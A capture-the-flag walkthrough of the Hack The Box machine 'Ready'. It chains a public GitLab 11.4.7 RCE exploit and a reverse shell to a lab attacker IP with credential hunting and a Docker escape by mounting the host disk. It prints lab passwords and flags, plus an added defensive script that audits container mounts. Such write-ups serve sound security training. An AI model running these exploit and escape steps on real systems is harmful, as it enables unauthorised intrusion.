Saturday, June 5, 2021

HTB - Ready

Today we will break a retired, Medium-difficulty HTB machine called Ready.

You will learn basic Linux and Docker enumeration, and we will take advantage of a known GitLab vulnerability that leads to RCE.


DESCRIPTION 

10.10.10.220 - Linux 


ENUMERATION


Port enumeration

We will start by enumerating all 65535 TCP ports:

nmap -p- --open -v -n 10.10.10.220 -oN ready_puertos -Pn --min-rate 100

PORT     STATE SERVICE

22/tcp   open  ssh

5080/tcp open  onscreen


Services basic enumeration

alter@kali:~/htb-vip/ready$ nmap -sC -sV -p22,5080 10.10.10.220 -oN ready_servicios

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

5080/tcp open  http    nginx

| http-robots.txt: 53 disallowed entries (15 shown)

| / /autocomplete/users /search /api /admin /profile 

| /dashboard /projects/new /groups/new /groups/*/edit /users /help 

|_/s/ /snippets/new /snippets/*/edit

| http-title: Sign in \xC2\xB7 GitLab

|_Requested resource was http://10.10.10.220:5080/users/sign_in

|_http-trane-info: Problem with XML parsing of /evox/about

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


The enumeration phase reveals that the server is running GitLab.


FOOTHOLD

There is a registration feature available, so we can create an account and check the version.

If we click on Help, we see GitLab Community Edition 11.4.7

GitLab version 11.4.7 is affected by a Remote Code Execution chain tracked as CVE-2018-19571 and CVE-2018-19585.

Several PoCs can be found online:

https://github.com/ctrlsam/GitLab-11.4.7-RCE

git clone https://github.com/ctrlsam/GitLab-11.4.7-RCE

alter@kali:~/htb-vip/ready/GitLab-11.4.7-RCE$ python exploit.py -u alter -p alter1234 -g http://10.10.10.220 -l 10.10.14.5 -P 443

[+] authenticity_token: iUyMjtGwLGI2ItYNR9rXajdNJmRiwRTaPr5/en+6CWiIeRBwa1v6oLAWb/zJEZnUAReCjOv1t8iQ3ootP0gntA==

[+] Creating project with random name: project1159

[+] Running Exploit

[+] Exploit completed successfully!

alter@kali:~/htb-vip/ready$ sudo nc -nlvp 443

[sudo] password for alter: 

listening on [any] 443 ...

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.220] 46888

whoami

git


Get an interactive TTY

script /dev/null -c bash

Press Ctrl+Z to background the shell, then on the attacker machine run:

stty raw -echo; fg

Once the shell is back in the foreground, run:

reset

and answer "xterm" when asked for the terminal type.

git@gitlab:~/gitlab-rails/working$ whoami

git


The git user is able to read the user.txt flag:

git@gitlab:/home/dude$ ls -la

total 24

drwxr-xr-x 2 dude dude 4096 Dec  7 16:58 .

drwxr-xr-x 1 root root 4096 Dec  2  2020 ..

lrwxrwxrwx 1 root root    9 Dec  7 16:58 .bash_history -> /dev/null

-rw-r--r-- 1 dude dude  220 Aug 31  2015 .bash_logout

-rw-r--r-- 1 dude dude 3771 Aug 31  2015 .bashrc

-rw-r--r-- 1 dude dude  655 May 16  2017 .profile

-r--r----- 1 dude git    33 Dec  2  2020 user.txt

git@gitlab:/home/dude$ cat user.txt 

e1e30b052b6ec0670698805d745e7682


PRIV ESCALATION

We start by running lse.sh -l 1 to save time and get an overall view of the system.

The output reveals that we are inside a Docker container, so we will need to escape from it.

git@gitlab:/dev/shm/$ bash lse.sh -l 1

ctn000 Are we in a docker container?................................... yes!

-rwxr-xr-x 1 root root 0 Dec  1  2020 /.dockerenv


We see that the Docker host is exposing some folders into the container:


git@gitlab:/dev/shm$ df -h

Filesystem      Size  Used Avail Use% Mounted on

overlay          18G   12G  6.0G  66% /

tmpfs            64M     0   64M   0% /dev

tmpfs           2.0G     0  2.0G   0% /sys/fs/cgroup

/dev/sda2        18G   12G  6.0G  66% /root_pass

shm              64M  756K   64M   2% /dev/shm

git@gitlab:/dev/shm$ cat /root_pass 

YG65407Bjqvv9A0a8Tm_7w

git@gitlab:/dev/shm$ su root

YG65407Bjqvv9A0a8Tm_7w

We verify that this password is not the container's root password.


/dev/sda2 looks like the "/" filesystem of the Docker host,

so we need to mount /dev/sda2 inside our container in order to access the Docker host's folder structure.
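As an added check (not part of the original write-up), the following script flags the misconfiguration seen above from the defender's side: a physical host block device such as /dev/sda2 visible in a container's mount table. The sample mount lines are constructed to mirror the df -h output of the write-up; the function names are my own.

```shell
#!/bin/sh
# Audit a container's mount table for host block devices. In the write-up, the
# host's root partition /dev/sda2 shows up mounted at /root_pass inside the
# container, which lets a container root mount the whole host disk.

# Constructed sample in /proc/mounts format, modelled on the write-up's df -h.
SAMPLE_MOUNTS='overlay / overlay rw 0 0
tmpfs /dev tmpfs rw 0 0
tmpfs /sys/fs/cgroup tmpfs ro 0 0
/dev/sda2 /root_pass ext4 rw 0 0
shm /dev/shm tmpfs rw 0 0'

# find_host_block_mounts: read /proc/mounts-style lines on stdin and print
# "<device> <mountpoint>" for each entry backed by a physical block device.
# overlay, tmpfs and shm are normal inside a container; /dev/sd*, /dev/vd*,
# /dev/xvd*, /dev/nvme* and /dev/mmcblk* belong to the host.
find_host_block_mounts() {
    awk '$1 ~ /^\/dev\/(sd|vd|xvd|nvme|mmcblk)/ { print $1, $2 }'
}

# audit_mounts: take the mount table as a string, return 0 when clean and
# 1 (with a warning listing the offending entries) when a host device is found.
audit_mounts() {
    found=$(printf '%s\n' "$1" | find_host_block_mounts)
    if [ -n "$found" ]; then
        printf 'WARNING: host block device mounted in container:\n%s\n' "$found"
        return 1
    fi
    echo "OK: no host block devices mounted"
    return 0
}

# Demo run: "--live" audits the real /proc/mounts, otherwise the sample above.
if [ "${1:-}" = "--live" ]; then
    audit_mounts "$(cat /proc/mounts)" || true
else
    audit_mounts "$SAMPLE_MOUNTS" || true
fi
```

Run it with --live inside a container (the /.dockerenv marker lse.sh looks for tells you that you are in one) to confirm no host partition has been handed to the container.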


git@gitlab:/dev/shm$ mount /dev/sda2 /tmp/

mount: only root can do that


So we first need to get root inside the container.


Enumerating a little more, we find a password that allows us to get a root shell in the container:


git@gitlab:/opt/backup$ grep pass *

gitlab.rb:gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"


git@gitlab:/opt/backup$ su root

Password: 

root@gitlab:/opt/backup# whoami

root

root@gitlab:/opt/backup#


Now we can run mount to mount the Docker host's / filesystem into our container:


root@gitlab:/opt/backup# mount /dev/sda2 /tmp/test/

root@gitlab:/opt/backup# cd /tmp/test/

root@gitlab:/tmp/test# ls

bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr

boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var

root@gitlab:/tmp/test# cd root/

root@gitlab:/tmp/test/root# ls

docker-gitlab  ready-channel  root.txt  snap

root@gitlab:/tmp/test/root# cat root.txt 

b7f98681505cd39066f67147b103c2b3


